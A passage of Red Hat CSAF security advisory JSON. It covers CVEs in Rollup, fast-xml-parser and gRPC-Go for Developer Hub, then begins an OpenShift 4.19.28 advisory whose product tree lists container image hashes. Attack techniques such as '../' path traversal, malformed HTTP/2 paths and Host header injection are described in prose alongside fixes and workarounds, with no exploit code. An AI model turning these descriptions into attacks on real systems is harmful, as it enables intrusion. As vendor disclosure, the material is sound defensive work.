"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442530"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Rollup, a JavaScript module bundler. Insecure file name sanitization in the core engine allows an attacker to control output filenames, potentially through command-line interface (CLI) inputs, manual chunk aliases, or malicious plugins. By using directory traversal sequences (`../`), an attacker can overwrite files anywhere on the host filesystem where the build process has write permissions. This vulnerability can lead to persistent remote code execution (RCE) by overwriting critical system or user configuration files.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27606"
},
{
"category": "external",
"summary": "RHBZ#2442530",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442530"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27606",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27606"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27606"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2",
"url": "https://github.com/rollup/rollup/commit/c60770d7aaf750e512c1b2774989ea4596e660b2"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e",
"url": "https://github.com/rollup/rollup/commit/c8cf1f9c48c516285758c1e11f08a54f304fd44e"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3",
"url": "https://github.com/rollup/rollup/commit/d6dee5e99bb82aac0bee1df4ab9efbde455452c3"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v2.80.0",
"url": "https://github.com/rollup/rollup/releases/tag/v2.80.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v3.30.0",
"url": "https://github.com/rollup/rollup/releases/tag/v3.30.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/releases/tag/v4.59.0",
"url": "https://github.com/rollup/rollup/releases/tag/v4.59.0"
},
{
"category": "external",
"summary": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc",
"url": "https://github.com/rollup/rollup/security/advisories/GHSA-mw96-cpmx-2vgc"
}
],
"release_date": "2026-02-25T02:08:06.682000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "rollup: Rollup: Remote Code Execution via Path Traversal Vulnerability"
},
{
"cve": "CVE-2026-27942",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-02-26T03:01:53.367202+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442938"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A user can exploit this flaw by processing specially crafted XML data with the XML builder when the `preserveOrder` option is enabled. This can lead to a stack overflow, causing the application to crash and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw affects the XML builder component of the fast-xml-parser library and is triggered only when the preserveOrder option is explicitly enabled. In Red Hat\u2013shipped configurations, this option is not enabled by default, and the vulnerable code path is therefore not exercised under typical deployments.\nThe underlying issue results in uncontrolled recursion leading to a stack overflow condition, which causes the application to terminate unexpectedly. While this can be triggered via crafted input, the impact is limited strictly to denial of service (DoS) and does not provide a mechanism for arbitrary code execution, privilege escalation, or data disclosure.\nFurthermore, exploitation requires that the affected application processes attacker-controlled XML input through the XML builder functionality with the specific vulnerable configuration enabled. This significantly reduces the attack surface and introduces environmental constraints not considered in the generalized NVD scoring.\n\nGiven the absence of confidentiality and integrity impact, the requirement for non-default configuration, and the limitation of the impact to process termination, Red Hat considers the practical risk to be lower than the NVD assessment. As such, this issue is classified as Moderate severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27942"
},
{
"category": "external",
"summary": "RHBZ#2442938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442938"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27942",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27942"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27942"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/c13a961910f14986295dd28484eee830fa1a0e8a"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/pull/791"
},
{
"category": "external",
"summary": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3",
"url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-fj3w-jwp8-x2g3"
}
],
"release_date": "2026-02-26T01:22:11.383000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, configure applications using the `fast-xml-parser` XML builder to set the `preserveOrder` option to `false`. Alternatively, ensure that all XML input data is thoroughly validated before being passed to the builder to prevent the processing of malicious or malformed content.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "fast-xml-parser: fast-xml-parser: Stack overflow leads to Denial of Service"
},
{
"cve": "CVE-2026-33186",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-03-20T23:02:27.802640+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449833"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "RHBZ#2449833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
"url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
}
],
"release_date": "2026-03-20T22:23:32.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation"
}
]
}
RHSA-2026:7249
Vulnerability from csaf_redhat - Published: 2026-04-16 10:18 - Updated: 2026-04-16 11:09A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in the archive/zip package in the Go standard library. A super-linear file name indexing algorithm is used in the first time a file in an archive is opened. A crafted zip archive containing a specific arrangement of file names can cause an excessive CPU and memory consumption. A Go application processing a malicious archive can become unresponsive or crash, resulting in a denial of service.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in Koa’s ctx.hostname API used in Node.js applications. The function incorrectly parses specially crafted HTTP Host headers containing an @ character, which can cause the extracted hostname value to differ from the intended origin. An attacker can exploit this behavior by sending a malicious Host header to influence the hostname value returned by ctx.hostname. Applications that rely on this value for generating absolute URLs, password reset links, or email verification links without additional validation may be susceptible to Host header injection attacks.
| URL | Category | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.19.28 is now available with updates to packages and images that fix several bugs and add enhancements.\n\n This release includes a security update for Red Hat OpenShift Container Platform 4.19.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.\n\nThis advisory contains the container images for Red Hat OpenShift Container Platform 4.19.28. See the following advisory for the RPM packages for this release:\n\nhttps://access.redhat.com/errata/RHBA-2026:7241\n\nSpace precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:7249",
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61726",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2025-61728",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-25639",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-27959",
"url": "https://access.redhat.com/security/cve/CVE-2026-27959"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_7249.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.19.28 bug fix and security update",
"tracking": {
"current_release_date": "2026-04-16T11:09:29+00:00",
"generator": {
"date": "2026-04-16T11:09:29+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.5"
}
},
"id": "RHSA-2026:7249",
"initial_release_date": "2026-04-16T10:18:08+00:00",
"revision_history": [
{
"date": "2026-04-16T10:18:08+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-16T10:19:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-04-16T11:09:29+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.19",
"product": {
"name": "Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.19::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Container Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775573215"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"product": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"product_id": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-karpenter-provider-aws-rhel9@sha256%3Aa31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572657"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"product": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"product_id": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/aws-kms-encryption-provider-rhel9@sha256%3A4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564570"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-rhel9@sha256%3Adaddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775559294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"product_id": "registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-azure-file-csi-driver-operator-rhel9@sha256%3A5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557242"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"product": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"product_id": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/azure-kms-encryption-provider-rhel9@sha256%3A6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605177"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-machine-controllers-rhel9@sha256%3A99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90?arch=amd64\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775557298"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"product_identification_helper": {
